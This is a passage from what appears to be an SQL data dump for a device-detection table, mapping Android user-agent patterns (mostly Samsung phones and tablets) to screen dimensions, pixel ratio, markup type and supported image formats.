Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J120A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J210F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J327P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J500FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J500G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J5108) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J510FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J510H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J510MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J510UN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J700H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J700M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J700T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J7108) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J710GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J710MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N9100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N910C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N910F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N910H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N910P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N910S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N910U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N910V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N915F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N915FY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N920C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-N930F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-S120VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-S327VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-S727VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-T550) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-T555) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-T580) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-T585) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-T700) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-T705M) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-T800) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-T805) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-G870A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-G890A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-G891A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-G900A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-G920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-G925A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-G928A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-G930A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-G935A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-J120A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-J120AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-J320A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-J320AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-J321AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-N910A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-N920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG-SM-T377A) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SC-01G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SC-04F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SC-05G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SC7731) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SCL23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SENSEIT_A109) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SGP521) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SH-01H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SH-02J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SH-03G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SH-M03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SH-M04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SHIFT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SHV36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SHV37) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SHV37_u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SL452) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SL514) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SL552) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 